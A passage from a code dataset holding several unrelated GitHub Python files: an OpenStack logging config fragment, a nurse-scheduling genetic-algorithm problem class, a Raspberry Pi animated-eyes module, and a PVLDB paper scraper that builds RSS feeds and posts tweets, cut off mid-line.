'requests.packages.urllib3.connectionpool=WARN',\n 'urllib3.connectionpool=WARN', 'websocket=WARN',\n 'keystonemiddleware=WARN', 'routes.middleware=WARN',\n 'stevedore=WARN', 'glanceclient=WARN']\n\n_DEFAULT_LOGGING_CONTEXT_FORMAT = ('%(asctime)s.%(msecs)03d %(process)d '\n '%(levelname)s %(name)s [%(request_id)s '\n '%(user_identity)s] %(instance)s'\n '%(message)s')\n\n\n\ndef parse_args(argv, **kwargs):\n log.set_defaults(_DEFAULT_LOGGING_CONTEXT_FORMAT, _DEFAULT_LOG_LEVELS)\n log.register_options(CONF)\n options.set_defaults(CONF, connection=_DEFAULT_SQL_CONNECTION,\n sqlite_db='daolicontroller.sqlite')\n CONF(argv[1:],\n project='daolicontroller',\n version='1.0',\n **kwargs)\n","repo_name":"daolicloud/daolinet-openstack","sub_path":"daolicontroller/daolicontroller/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"19595343464","text":"import json\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils import solution_to_numpy, solution_to_list\n\n\nclass 
Problem:\n    \"\"\"A problem class that loads from json file,\n    handles visualization and evaluation of solutions.\"\"\"\n\n    def __init__(self, file: str) -> None:\n        self.file = file\n        with open(file, \"r\", encoding=\"UTF-8\") as file:\n            self.data = json.load(file)\n\n        self.instance_name = self.data[\"instance_name\"]\n        self.nbr_nurses = self.data[\"nbr_nurses\"]\n        self.capacity_nurse = self.data[\"capacity_nurse\"]\n        self.depot = self.data[\"depot\"]\n        self.list_patients = self.data[\"patients\"]\n        self.numpy_patients = self.list_patients_to_numpy(self.list_patients)\n        # assumes id 1-len(patients) are used\n        self.nbr_patients = len(self.numpy_patients)\n        self.travel_times = np.asarray(self.data[\"travel_times\"])\n\n    def list_patients_to_numpy(\n        self, list_patients: dict[str, dict[str, int]]\n    ) -> np.ndarray:\n        \"\"\"Converts patients to numpy array.\"\"\"\n        list_patients = [\n            [\n                patient[\"x_coord\"],\n                patient[\"y_coord\"],\n                patient[\"demand\"],\n                patient[\"start_time\"],\n                patient[\"end_time\"],\n                patient[\"care_time\"],\n            ]\n            for patient in list_patients.values()\n        ]\n        return np.asarray(list_patients)\n\n    def visualize_problem(self) -> None:\n        \"\"\"Visualize the problem instance.\"\"\"\n        # plot depot\n        plt.scatter(self.depot[\"x_coord\"], self.depot[\"y_coord\"], c=\"r\")\n        # plot patients (ids run from 1 to nbr_patients inclusive)\n        for idx in range(1, self.nbr_patients + 1):\n            idx = str(idx)\n            plt.scatter(\n                self.list_patients[idx][\"x_coord\"],\n                self.list_patients[idx][\"y_coord\"],\n                c=\"b\",\n            )\n        plt.show()\n\n    def visualize_solution(self, solution: list | np.ndarray) -> None:\n        \"\"\"Visualize a solution.\n\n        Args:\n            solution (list | np.ndarray): Solution on either list or numpy format.\n        \"\"\"\n\n        if isinstance(solution, list):\n            list_solution = solution\n        else:\n            list_solution = solution_to_list(solution)\n\n        # plot depot\n        plt.scatter(self.depot[\"x_coord\"], self.depot[\"y_coord\"], c=\"r\")\n        # plot patients\n        for idx in range(1, self.nbr_patients + 1):\n            idx = str(idx)\n            plt.scatter(\n                self.list_patients[idx][\"x_coord\"],\n                self.list_patients[idx][\"y_coord\"],\n                c=\"b\",\n            )\n        # plot solution routes\n        for nurse in list_solution:\n            # add depot to start and end of route\n            xs = [self.depot[\"x_coord\"]]\n            ys = [self.depot[\"y_coord\"]]\n            # add patients to route\n            for patient in nurse:\n                idx = str(patient)\n                xs.append(self.list_patients[idx][\"x_coord\"])\n                ys.append(self.list_patients[idx][\"y_coord\"])\n\n            xs.append(self.depot[\"x_coord\"])\n            ys.append(self.depot[\"y_coord\"])\n            plt.plot(xs, ys)\n\n        plt.show()\n\n    def print_solution(\n        self, solution: list | np.ndarray, fitness: float, is_valid: bool\n    ) -> None:\n        \"\"\"Prints a solution in the desired format.\n\n        Args:\n            solution (list | np.ndarray): Solution on either list or numpy format.\n        \"\"\"\n\n        if isinstance(solution, list):\n            list_solution = solution\n            # numpy_solution = solution_to_numpy(solution)\n        else:\n            list_solution = solution_to_list(solution)\n            # numpy_solution = solution\n\n        print()\n        print(\"SOLUTION\")\n        print(f\"Nurse capacity: {self.capacity_nurse}\")\n        print()\n        print(f\"Depot return time: {self.depot['return_time']}\")\n        print(\"------------------------------------------------\")\n        # check nurse path\n        for nurse_idx, nurse_patients in enumerate(list_solution):\n            # calculate used nurse capacity\n            nurse_used_capacity = 0\n            # calculate time\n            tot_time = 0\n            # add depot to start\n            prev_spot_idx = 0\n            # set up the patient sequence, starting with used demand 0\n            patient_sequence = [\"D(0)\"]\n            # add patients to route\n            for patient in 
nurse_patients:\n str_idx = str(patient)\n\n # get travel time\n travel_time = self.travel_times[prev_spot_idx, patient]\n tot_time += travel_time\n arrival_time = tot_time\n\n # check if time window is met\n # penalty is both added if arrival after end time and if service ends after end time\n if tot_time < self.list_patients[str_idx][\"start_time\"]:\n # wait until start time\n tot_time = self.list_patients[str_idx][\"start_time\"]\n\n # add service time\n tot_time += self.list_patients[str_idx][\"care_time\"]\n # add used capacity\n nurse_used_capacity += self.list_patients[str_idx][\"demand\"]\n\n # update prev spot\n prev_spot_idx = patient\n\n # add patient to sequence\n patient_visit_info = (\n f\"{patient} ({arrival_time:.2f}-{arrival_time + self.list_patients[str_idx]['care_time']:.2f})\"\n + f\" [{self.list_patients[str_idx]['start_time']:.2f}-{self.list_patients[str_idx]['end_time']:.2f}]\"\n )\n patient_sequence.append(patient_visit_info)\n # add current used demand\n patient_sequence.append(f\"D({nurse_used_capacity})\")\n\n print(\n f\"Nurse {nurse_idx}\"\n + f\" | {tot_time}\"\n + f\" | {nurse_used_capacity}\"\n + f\" | {patient_sequence}\"\n )\n # space inbetween nurses\n print()\n\n print(\"------------------------------------------------\")\n print(f\"Objective value (total duration): {fitness}\")\n print(f\"Valid solution: {is_valid}\")\n\n\nif __name__ == \"__main__\":\n from initializations import generate_random_genome\n from evaluations import evaluate\n\n problem = Problem(\"data/train_0.json\")\n print(f\"instance_name {problem.instance_name}\")\n print(f\"nbr_nurses {problem.nbr_nurses}\")\n print(f\"capacity_nurse {problem.capacity_nurse}\")\n print(f\"depot {problem.depot}\")\n print(f\"patients {problem.numpy_patients}\")\n print(f\"travel_times {problem.travel_times}\")\n print(f\"nbr_patients {problem.nbr_patients}\")\n print(f\"list_patients {problem.list_patients}\")\n print(f\"numpy_patients {problem.numpy_patients}\")\n\n sol = generate_random_genome(\n n_nurses=problem.nbr_nurses, n_patients=problem.nbr_patients\n )\n fitness, is_valid = evaluate(\n solution=sol,\n )\n problem.print_solution(sol, fitness, is_valid)\n problem.visualize_solution(sol)\n","repo_name":"SigmaDerivative/Nurse-Schedule-GA","sub_path":"python/problem_setup.py","file_name":"problem_setup.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37759081454","text":"#!/usr/bin/python\n# coding: utf8\n# Eyes Module\n# P20 Camila.Arias\n\nimport Adafruit_ADS1x15 \nimport argparse\nimport math\nimport pi3d\nimport random\nimport thread\nimport time\nimport RPi.GPIO as GPIO \nfrom svg.path import Path, parse_path\nfrom xml.dom.minidom import parse\nfrom gfxutil import *\n\n#---------- : controller OLED\nfrom controller import Controller\n\n\n# Set up display and initialize pi3d ---------------------------------------\n# Here ! dimensions change [Dimensions 128x4,128x2]\nDISPLAY = pi3d.Display.create(w=512,h=256,samples=4) \nDISPLAY.set_background(0, 0, 0, 1) # r,g,b,alpha\n\n# eyeRadius is the size, in pixels, at which the whole eye will be rendered\n# onscreen. eyePosition, also pixels, is the offset (left or right) from\n# the center point of the screen to the center of each eye. 
This geometry\n# is explained more in-depth in fbx2.c.\neyePosition = DISPLAY.width / 4\neyeRadius = 96 \n\n# A 2D camera is used, mostly to allow for pixel-accurate eye placement,\n# but also because perspective isn't really helpful or needed here, and\n# also this allows eyelids to be handled somewhat easily as 2D planes.\n# Line of sight is down Z axis, allowing conventional X/Y cartesion\n# coords for 2D positions.\ncam = pi3d.Camera(is_3d=False, at=(0,0,0), eye=(0,0,-1000))\nshader = pi3d.Shader(\"uv_light\")\nlight = pi3d.Light(lightpos=(0, -500, -500), lightamb=(0.2, 0.2, 0.2))\n\n# Layers configuration to obtain the 2D point list. Name of each layer is\n# the same as SVG image. \"id\": [numPoints,closedSurface ?,reverse ?]\nlayers = [(\"pupilMin\" ,32, True , True),\n (\"pupilMax\" ,32, True , True),\n (\"iris\" ,32, True , True),\n (\"scleraFront\" , 0, False, False),\n (\"scleraBack\" , 0, False, False),\n (\"upperLidClosed\" ,33, False, True),\n (\"upperLidOpen\" ,33, False, True) ,\n (\"upperLidEdge\" ,33, False, False),\n (\"lowerLidClosed\" ,33, False, False),\n (\"lowerLidOpen\" ,33, False, False),\n (\"lowerLidEdge\" ,33, False, False)]\n\ndom = parse(\"graphics/test.svg\")\nvb = getViewBox(dom)\npoints = []\nfor l in layers:\n #convert to point lists --------------------\n points.append(getPoints(dom,l[0],l[1],l[2],l[3]))\n # Transform point lists to eye dimensio\n scalePoints(points[-1],vb,eyeRadius)\n\n\n#Dictionary to obtain the number of layer\nto = { \"pupilMinPts\": 0,\n \"pupilMaxPts\": 1,\n \"irisPts\":2,\n \"scleraFrontPts\":3,\n \"scleraBackPts\":4,\n \"upperLidClosedPts\":5,\n \"upperLidOpenPts\" :6,\n \"upperLidEdgePts\":7,\n \"lowerLidClosedPts\":8,\n \"lowerLidOpenPts\":9,\n \"lowerLidEdgePts\":10 }\n\"\"\"\nClass representing an Eye\n\"\"\"\nclass Eye: \n\n\n def __init__(self,eyePosition,eyeRadius,id):\n global points,to\n self.eyePosition = eyePosition\n self.eyeRadius = eyeRadius\n #Load texture maps --------------------------------------------------------\n irisMap = pi3d.Texture(\"./graphics/iris.jpg\" , mipmap=False,\n filter=pi3d.GL_LINEAR)\n scleraMap = pi3d.Texture(\"./graphics/sclera.png\", mipmap=False,\n filter=pi3d.GL_LINEAR, blend=True)\n lidMap = pi3d.Texture(\"./graphics/lid.png\" , mipmap=False,\n filter=pi3d.GL_LINEAR, blend=True)\n #init iris\n self.iris = meshInit(32, 4, True, 0, 0.5/irisMap.iy, False)\n self.iris.set_textures([irisMap])\n self.iris.set_shader(shader) \n #init sclera\n self.eye = pi3d.Lathe(path=self.generate_sclera(eyeRadius), sides=64)\n self.eye.set_textures([scleraMap])\n self.eye.set_shader(shader) \n self.irisZ = zangle(points[to[\"irisPts\"]], eyeRadius)[0] * 0.99 # Get iris Z depth, for later\n #init upperlid\n self.upperEyelid = meshInit(33, 5, False, 0, 0.5/lidMap.iy, True)\n self.upperEyelid.set_textures([lidMap])\n self.upperEyelid.set_shader(shader)\n #init lowerlid\n self.lowerEyelid = meshInit(33, 5, False, 0, 0.5/lidMap.iy, True)\n self.lowerEyelid.set_textures([lidMap])\n self.lowerEyelid.set_shader(shader)\n #LEFT 0\n if id == 0:\n #init config if id (left id) is indicated\n self.eye.positionX(eyePosition)\n self.iris.positionX(eyePosition)\n self.upperEyelid.positionX(eyePosition)\n self.lowerEyelid.positionX(eyePosition)\n reAxis(self.eye, 0)\n else:\n #init right eye\n self.eye.positionX(-eyePosition)\n self.iris.positionX(-eyePosition)\n self.upperEyelid.positionX(-eyePosition)\n self.lowerEyelid.positionX(-eyePosition)\n reAxis(self.eye, 0.5)\n\n #initial position\n 
self.upperEyelid.positionZ(-eyeRadius - 42) \n self.lowerEyelid.positionZ(-eyeRadius - 42)\n self.irisRegenThreshold = self.get_iris_change()\n self.prevPupilScale = 0.5\n \n ##blinking\n self.luRegen = True\n self.prevLid = 0.5\n self.prevPts = pointsInterp(points[to[\"upperLidOpenPts\"]], points[to[\"upperLidClosedPts\"]],0.5)\n self.timeOfLastBlink = 0.0\n self.timeToNextBlink = 1.0\n self.trackingPos = 0.3\n self.blinkState = 0\n self.blinkDuration = 0.1\n self.blinkStartTime = 0\n self.limit = 0\n self.get_upper_limit()\n self.regenerate_iris(0.5)\n self.regenerate_upper_lid(0.4,True)\n self.regenerate_lower_lid(0.2)\n self.n = math.sqrt(900.0 - 15 * 15)\n\n #Define points of sclera \n def generate_sclera(self, eyeRadius):\n global points,to\n # Generate scleras for each eye...start with a 2D shape for lathing...\n angle1 = zangle(points[to[\"scleraFrontPts\"]], eyeRadius)[1] # Sclera front angle\n angle2 = zangle(points[to[\"scleraBackPts\"]], eyeRadius)[1] # \" back angle\n aRange = 180 - angle1 - angle2\n pts = []\n for i in range(24):\n ca, sa = pi3d.Utility.from_polar((90 - angle1) - aRange * i / 23)\n pts.append((ca * eyeRadius, sa * eyeRadius))\n return pts\n \n def get_iris_change(self):\n irisRegenThreshold = 0.0\n a = pointsBounds(points[to[\"pupilMinPts\"]]) # Bounds of pupil at min size (in pixels)\n b = pointsBounds(points[to[\"pupilMaxPts\"]]) # \" at max size\n maxDist = max(abs(a[0] - b[0]), abs(a[1] - b[1]), # Determine distance of max\n abs(a[2] - b[2]), abs(a[3] - b[3])) # variance around each edge\n # maxDist is motion range in pixels as pupil scales between 0.0 and 1.0.\n # 1.0 / maxDist is one pixel's worth of scale range. Need 1/4 that...\n if maxDist > 0: irisRegenThreshold = 0.25 / maxDist\n return irisRegenThreshold\n \n def get_upper_limit(self):\n p1 = points[to[\"upperLidOpenPts\"]][len(points[to[\"upperLidOpenPts\"]]) // 2]\n p2 = points[to[\"upperLidClosedPts\"]][len(points[to[\"upperLidClosedPts\"]]) // 2]\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n d = dx * dx + dy * dy\n if d > 0: self.limit = 0.25 / math.sqrt(d)\n\n def regenerate_iris(self,p):\n global points,to\n # Interpolate points between min and max pupil sizes\n interPupil = pointsInterp(points[to[\"pupilMinPts\"]], points[to[\"pupilMaxPts\"]], p)\n # Generate mesh between interpolated pupil and iris bounds\n mesh = pointsMesh(None, interPupil, points[to[\"irisPts\"]], 4, -self.irisZ, True)\n # Assign to both eyes\n self.iris.re_init(pts=mesh)\n #return previous\n return p\n \n def regenerate_upper_lid(self,p,case):\n global points,to\n # Interpolate points between min and max pupil sizes\n interUpperNew = pointsInterp(points[to[\"upperLidOpenPts\"]], points[to[\"upperLidClosedPts\"]], p)\n # Generate mesh between interpolated pupil and iris bounds\n if case:\n mesh = pointsMesh(points[to[\"upperLidEdgePts\"]], self.prevPts,interUpperNew, 5, 0, False,True)\n else:\n mesh = pointsMesh(points[to[\"upperLidEdgePts\"]],interUpperNew,self.prevPts, 5, 0, False,True)\n\n #return previous\n self.upperEyelid.re_init(pts=mesh)\n self.prevPts = interUpperNew\n return p\n\n def regenerate_lower_lid(self,p):\n global points,to\n # Interpolate points between min and max pupil sizes\n interUpper = pointsInterp(points[to[\"lowerLidOpenPts\"]], points[to[\"lowerLidClosedPts\"]],0.5)\n interUpperNew = pointsInterp(points[to[\"lowerLidOpenPts\"]], points[to[\"lowerLidClosedPts\"]], p)\n # Generate mesh between interpolated pupil and iris bounds\n mesh = pointsMesh(points[to[\"lowerLidEdgePts\"]], 
interUpper,interUpperNew, 5, 0, False,True)\n        #return previous\n        self.lowerEyelid.re_init(pts=mesh)\n        return p\n\n\n    #______methods to visualize\n    \n    def draw(self):\n        self.eye.draw()\n        self.iris.draw()\n        self.upperEyelid.draw()\n        #self.lowerEyelid.draw()\n\n    #Change iris's color\n    def regenerate_map(self,color,p): \n        self.iris.set_material(color)\n        self.regenerate_iris(p)\n    \n    def frame(self,now): \n        self.blink(now) \n    \n    def blink(self,now):\n        #check final\n        if (now - self.timeOfLastBlink) >= self.timeToNextBlink:\n            self.timeOfLastBlink = now\n            duration = 0.7 # Init duration\n            if self.blinkState != 1:\n                self.blinkState = 1\n                self.blinkStartTime = now\n                self.blinkDuration = duration\n                self.timeToNextBlink = duration * 5 \n        \n        if self.blinkState:\n            if (now - self.blinkStartTime) >= self.blinkDuration:\n                self.blinkState += 1 \n                if self.blinkState > 2:\n                    self.blinkState = 0 # NOBLINK \n                else:\n                    self.blinkDuration *= 2.5\n                    self.blinkStartTime = now\n            else:\n                self.n = (now - self.blinkStartTime) / self.blinkDuration\n                if self.n > 1.0: self.n = 1.0\n                if self.blinkState == 2: self.n = 1.0 - self.n\n        else:\n            self.n = 0.0\n        \n        newLid = self.trackingPos + (self.n * (1.0 - self.trackingPos)) \n        if (self.luRegen or (abs(newLid - self.prevLid) >= self.limit)):\n            #is there any change?\n            if newLid > self.prevLid:\n                #change prevpts\n                self.regenerate_upper_lid(newLid,True)\n            else:\n                #change prevpts\n                self.regenerate_upper_lid(newLid,False)\n            self.prevLid = newLid\n            self.luRegen = True\n        else:\n            self.luRegen = False\n        \n    \n    #Make a movement\n    def rotate(self,curX,curY):\n        self.iris.rotateToX(curY)\n        self.iris.rotateToY(curX + 2)\n        self.eye.rotateToX(curY) \n        self.eye.rotateToY(curX + 2)\n        \n\"\"\"\nClass representing animated eyes\n\n\"\"\"\nclass Eyes:\n\n\n    def __init__(self):\n        self.oled = Controller() #ACTIVE CODE C to controller OLED\n        self.oled.open_OLED() #Active method\n        self.right = Eye(eyePosition,eyeRadius,0.5)\n        self.left = Eye(eyePosition,eyeRadius,0) \n        #Variables to describe movement\n        self.startTime = 0.0\n        self. 
startX = random.uniform(-20.0, 20.0) \n self.startY = random.uniform(-20, 10)\n self.destX = self.startX\n self.destY = self.startY\n self.curX = self.startX\n self.curY = self.startY\n self.moveDuration = random.uniform(0.09, 0.2)\n self.holdDuration = random.uniform(0.5, 1.5)\n self.isMoving = False\n \n def draw(self):\n self.right.draw()\n self.left.draw()\n \n def color(self,color,p):\n self.right.regenerate_map(color,p)\n self.left.regenerate_map(color,p)\n \n def blink(self): \n DISPLAY.loop_running() \n now = time.time()\n self.left.frame(now) #calcul new frame \n self.right.frame(now) #calcul new frame\n self.move(now) #calcul new coordinates \n self.left.rotate(self.curX,self.curY) #Update X,Y\n self.right.rotate(self.curX,self.curY)\n self.draw()\n\n def move(self,now):\n dt = now - self.startTime\n # Autonomous eye position\n if self.isMoving == True:\n if dt <= self.moveDuration:\n scale = (now - self.startTime) / self.moveDuration\n scale = scale * scale\n self.curX = self.startX + (self.destX - self.startX) * scale\n self.curY = self.startY + (self.destY - self.startY) * scale\n else:\n self.startX = self.destX\n self.startY = self.destY\n self.curX = self.destX\n self.curY = self.destY\n self.holdDuration = random.uniform(0.5, 1.5)\n self.startTime = now\n self.isMoving = False\n else:\n if dt >= self.holdDuration:\n self.destX = random.uniform(-20.0, 20.0)\n self.n = math.sqrt(900.0 - self.destX * self.destX)\n self.destY = random.uniform(-20,10)\n self.moveDuration = random.uniform(0.09, 0.2)\n self.startTime = now\n self.isMoving = True\n\n def close(self):\n DISPLAY.stop()\n #---------------------close process to OLED\n self.oled.close_OLED()\n #-----------------------------------------\n exit(0)\n \n \n \n#--------------------------- TESTING CODE\n \nmykeys = pi3d.Keyboard() # For capturing key presse \nx = Eyes()\nwhile True:\n x.blink()\n k = mykeys.read()\n if k==27: \n x.close()\n mykeys.close()\n elif k == 97:\n x.color((1,0,0),1)\n elif k == 98:\n x.color((0,1,0),0.3)\n elif k == 99:\n x.color((0.5,0.5,0.5),0.5)\n \n \n\n\n\n\n\n\n","repo_name":"camila-ud/Pi_Eyes_module","sub_path":"eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":13681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7035717201","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport re\nimport urllib.request, urllib.parse, urllib.error\nimport logging\nimport pytz\nimport time\nimport argparse\nimport sqlite3\nfrom datetime import datetime\nfrom datetime import tzinfo\nfrom pprint import pprint, pformat\nfrom feedgen.feed import FeedGenerator\nfrom bs4 import BeautifulSoup\n\nfrom config import *\n\n## ==============================================\n## LOGGING\n## ==============================================\nLOG = logging.getLogger(__name__)\nLOG_handler = logging.StreamHandler()\nLOG_formatter = logging.Formatter(fmt='%(asctime)s [%(funcName)s:%(lineno)03d] %(levelname)-5s: %(message)s',\n datefmt='%m-%d-%Y %H:%M:%S')\nLOG_handler.setFormatter(LOG_formatter)\nLOG.addHandler(LOG_handler)\nLOG.setLevel(logging.INFO)\n\n\ndateRe = re.compile(\"Volume ([\\d]+), No\\.[\\s]?([\\d]+)\") # , ([A-Z][a-z]+ [\\d]{4})\")\n\nVOLUME_LABELS = { }\n\n## ==============================================\n## getVolumeUrls\n## ==============================================\ndef getVolumeUrls(url):\n volumes = [ ]\n \n # Brute force search for volumes\n for vol in range(15,16):\n url = START_URL % vol\n 
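# a volume exists only if its URL opens; any exception raised below is treated as the volume not existing, so it is skipped\n        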
LOG.debug(\"Checking whether volume '%s' exists\" % url)\n try:\n r = urllib.request.urlopen(url).read()\n if not url in volumes:\n volumes.append(url)\n except:\n LOG.debug(\"Volume #%d does not exist. Skipping...\" % vol)\n pass\n ## FOR\n assert len(volumes) > 0 \n return volumes\n \n #soup = BeautifulSoup(r, \"lxml\")\n #regex = re.compile(\"\\/vol[\\d]+-volume-info\\.html\")\n #for a in soup.find_all('a'):\n #if not \"href\" in a.attrs:\n ## pprint(a.__dict__)\n #LOG.warn(\"No 'href' tag found. Skipping '%s'\" % str(a))\n #continue\n \n #m = regex.search(a[\"href\"])\n #if a[\"href\"].find(\"/pvldb/vol\") != -1:\n #pprint(a.__dict__)\n #pprint(m)\n #print(\"=\"*20)\n #if m and not a[\"href\"] in volumes:\n #if a[\"href\"] in SKIP:\n #LOG.warn(\"Skipping '%s'\" % a[\"href\"])\n #continue\n #volumes.append(a[\"href\"])\n ### FOR\n #assert len(volumes) > 0 \n #return [ BASE_URL + x for x in volumes ]\n## DEF\n\n## ==============================================\n## getPapersFromDiv\n## ==============================================\ndef getPapersFromDiv(volume, number, div):\n papers = [ ]\n paper_divs = div.find_all(class_=\"shadow-app\")\n if paper_divs is None:\n LOG.warn(\"Failed to find any papers in DIV '%s'\" % div.text)\n return papers\n\n for paper_div in paper_divs:\n data = [ ]\n # pprint(paper_div.__dict__)\n # print(\"=\"*100)\n\n try:\n # Pages, Authors\n results = paper_div.find_all('p')\n for element in results:\n # print(\"*\"*60)\n # pprint(element.__dict__)\n data.append(element.contents[0])\n ## FOR\n\n # Title\n results = paper_div.find_all('h5')\n for element in results:\n # print(\"*\"*60)\n # pprint(element.__dict__)\n data.append(element.contents[0])\n\n # Paper PDF URL\n results = paper_div.find_all('a')\n for element in results:\n url = element[\"href\"].replace(\"http:\", \"https:\")\n data.append(url)\n\n # print(\"%\"*30)\n # pprint(data)\n\n papers.append({\n \"authors\": data[1],\n \"title\": data[2],\n \"volume\": volume,\n \"number\": number,\n \"link\": data[3],\n \"published\": datetime.today().replace(tzinfo=pytz.utc),\n })\n LOG.debug(\"Found new paper for 'Vol:%d, Number:%d'\\n%s\", volume, number, pformat(papers[-1]))\n except:\n LOG.error(\"Unexpected error for 'Vol:%d, Number:%d' DIV\", volume, number)\n raise\n ## FOR\n return papers\n## DEF\n\n\n## ==============================================\n## getPapers\n## ==============================================\ndef getPapers(volume, vol_url):\n LOG.debug(\"Retreiving papers for %s\" % vol_url)\n\n html = None\n # with open(\"/tmp/pvldb.html\", \"r\") as fd:\n # html = fd.read()\n r = urllib.request.urlopen(vol_url).read()\n soup = BeautifulSoup(r, \"lxml\")\n\n number = 1\n papers = { }\n while True:\n LOG.debug(\"Looking for 'Vol:%d, Number:%d' DIV\", volume, number)\n div = soup.find('div', {\"id\": \"issue-%d\" % number})\n if not div:\n break\n\n key = (volume, number)\n papers[key] = getPapersFromDiv(volume, number, div)\n if len(papers[key]) > 0:\n LOG.debug(\"Found %d papers for 'Vol:%d, Number:%d'\\n%s\", len(papers[key]), volume, number, pformat(papers))\n\n number = number + 1\n ## WHILE\n return (papers)\n## DEF\n\n## ==============================================\n## writeRSS\n## ==============================================\ndef writeRSS(papers, output):\n fg = FeedGenerator()\n fg.id(RSS_URL)\n fg.title(RSS_TITLE)\n fg.subtitle(RSS_SUBTITLE)\n fg.author(RSS_AUTHOR)\n fg.link( href='http://www.vldb.org/pvldb/', rel='alternate' )\n fg.language('en')\n \n for p in papers:\n summary = 
\"%(title)s\\nAuthors: %(authors)s\\nPVLDB Volume %(volume)d, Number %(number)d\" % p\n \n fe = fg.add_entry()\n fe.author(name=p[\"authors\"])\n fe.title(p[\"title\"])\n fe.link(href=p[\"link\"]) \n fe.id(p[\"link\"])\n fe.published(published=p[\"published\"])\n fe.description(description=summary, isSummary=True)\n ## FOR\n \n atomfeed = fg.atom_str(pretty=True) # Get the ATOM feed as string\n atom_file = os.path.join(output, 'pvldb-atom.xml')\n fg.atom_file(atom_file) # Write the ATOM feed to a file\n LOG.info(\"Created ATOM '%s'\" % atom_file)\n \n rssfeed = fg.rss_str(pretty=True) # Get the RSS feed as string\n rss_file = os.path.join(output, RSS_FILE)\n fg.rss_file(rss_file) # Write the RSS feed to a file\n LOG.info(\"Created RSS '%s'\" % rss_file)\n## DEF\n\n## ==============================================\n## postTwitter\n## ==============================================\ndef postTwitter(args, db, paper):\n LOG.info(\"Posting paper '%s' to twitter!\" % paper[\"title\"])\n \n api = twitter.Api(consumer_key=args[\"twitter_consumer_key\"],\n consumer_secret=args[\"twitter_consumer_secret\"],\n access_token_key=args[\"twitter_access_token\"],\n access_token_secret=args[\"twitter_access_secret\"])\n \n #paper[\"separator\"] = u\"→\".encode('unicode-escape')\n \n tweet = \"Vol:%(volume)d No:%(number)d → %(title)s\" % paper\n if len(tweet)+24 > TWITTER_NUM_CHARS:\n remaining = TWITTER_NUM_CHARS - (len(tweet)+24)\n tweet = tweet[:remaining-3] + \"...\"\n tweet += \" \" + paper[\"link\"]\n \n LOG.debug(\"%s [Length=%d]\" % (tweet, len(tweet)))\n\n status = api.PostUpdate(tweet)\n LOG.info(\"Posted tweet [status=%s]\", str(status))\n \n cur = db.cursor()\n sql = \"UPDATE papers SET twitter = 1 WHERE link = ?\"\n cur.execute(sql, (paper[\"link\"], ))\n db.commit()\n \n## DEF\n\n\n## ==============================================\n## createDatabase\n## ==============================================\ndef createDatabase():\n db = sqlite3.connect(DB_PATH)\n cur = db.cursor()\n \n sql = \"\"\"\n CREATE TABLE papers (\n link VARCHAR(255) PRIMARY KEY,\n title TEXT NOT NULL,\n authors TEXT NOT NULL,\n volume INT NOT NULL,\n number INT NOT NULL,\n published DATE NOT NULL,\n twitter INT NOT NULL DEFAULT 0,\n created timestamp DEFAULT CURRENT_TIMESTAMP\n );\"\"\"\n cur.execute(sql)\n db.commit()\n db.close()\n \n## FOR\n\n\n## ==============================================\n## main\n## ==============================================\nif __name__ == '__main__':\n aparser = argparse.ArgumentParser(description='PVLDB Announcements Script')\n aparser.add_argument('dbpath', help='Database Path')\n aparser.add_argument(\"--debug\", action='store_true')\n\n ## Collection Parameters\n agroup = aparser.add_argument_group('Collection Parameters')\n agroup.add_argument('--collect', action='store_true', help='Collect results from PVLDB website')\n agroup.add_argument('--collect-start', type=int, help='Start volume to check')\n agroup.add_argument('--collect-stop', type=int, help='Stop volume to check (inclusive)')\n\n ## RSS Parameters\n agroup = aparser.add_argument_group('RSS Parameters')\n agroup.add_argument('--rss', action='store_true', help='Genereate RSS/Atom file')\n agroup.add_argument('--rss-path', type=str, help='RSS output directory')\n\n ## Twitter Parameters\n agroup = aparser.add_argument_group('RSS Parameters')\n agroup.add_argument('--twitter', action='store_true', help='Post announcements on Twitter')\n agroup.add_argument('--twitter-consumer-key', type=str, help='Twitter Consumer Key')\n 
agroup.add_argument('--twitter-consumer-secret', type=str, help='Twitter Consumer Secret')\n agroup.add_argument('--twitter-access-token', type=str, help='Twitter Access Token Key')\n agroup.add_argument('--twitter-access-secret', type=str, help='Twitter Access Token Secret')\n agroup.add_argument('--twitter-limit', type=int, help='Number of papers to announce before stopping')\n agroup.add_argument('--twitter-preference', type=str, help='Author ordering preference')\n \n args = vars(aparser.parse_args())\n\n ## ----------------------------------------------\n \n if args['debug']:\n LOG.setLevel(logging.DEBUG)\n\n # If they want to post to twitter, make sure they give us all the info\n # that we need to do this\n if args[\"twitter\"]:\n LOG.debug(\"Checking twitter input arguments\")\n for k in list(args.keys()):\n if k.startswith(\"twitter\") and k not in (\"twitter_limit\", \"twitter_preference\") and args[k] is None:\n LOG.error(\"Missing '%s' input parameter for Twitter\" % k)\n sys.exit(1)\n ## FOR\n ## IF\n\n ## ----------------------------------------------\n \n # Create the database if we don't have it\n if not os.path.exists(DB_PATH):\n createDatabase()\n db = sqlite3.connect(DB_PATH)\n cur = db.cursor()\n \n # Get the volume URLs\n if args[\"collect\"]:\n papers = { }\n for vol in range(args[\"collect_start\"], args[\"collect_stop\"]+1):\n url = START_URL % vol\n p = getPapers(vol, url)\n if p: papers.update(p)\n\n # Figure out what papers are new\n for key in reversed(sorted(papers.keys())):\n LOG.debug(\"key=%s\", key)\n for p in papers[key]:\n sql = \"SELECT * FROM papers WHERE link = ?\"\n cur.execute(sql, (p[\"link\"],))\n row = cur.fetchone()\n if row is None:\n LOG.debug(\"Adding %s\" % p[\"link\"])\n \n sql = \"\"\"INSERT INTO papers (\n link, title, authors, volume, number, published\n ) VALUES (\n ?, ?, ?, ?, ?, ?)\"\"\"\n cur.execute(sql, (p[\"link\"], p[\"title\"], p[\"authors\"], p[\"volume\"], p[\"number\"], p[\"published\"],))\n ## FOR\n ## FOR\n db.commit()\n ## IF\n\n ## Post new papers to Twitter\n if args[\"twitter\"]:\n sql = \"SELECT * FROM papers WHERE twitter = 0 ORDER BY volume ASC, number ASC, \"\n if 